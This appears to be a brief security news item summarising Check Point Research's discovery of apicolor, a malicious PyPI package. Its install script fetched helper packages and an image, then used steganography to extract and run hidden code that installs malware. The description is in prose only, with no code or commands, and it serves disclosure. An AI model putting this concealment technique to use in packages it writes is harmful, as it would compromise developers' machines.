Top
image credit: Unsplash

Malicious Python Package Relies on Steganography to Download Malware

November 10, 2022

Check Point Research has detected a malicious open source code package that uses steganography to hide malicious code inside image files.

The malicious package was available on PyPI, a package index widely used by Python developers. After being notified of it, PyPI’s maintainers have removed the malicious package.

The malicious package, apicolor, looks like one of many development packages available on PyPI. The header states the package is a “core lib for REST API.” The package installation script for apicolor has instructions to download additional packages (requests and judyb), along with a picture from the Web. The script then uses the steganography capabilities in judyb to uncover and execute the malicious code hidden inside the image file. The malicious code downloads malware from the Web and installs it on the user’s machine.

Read More on Dark Reading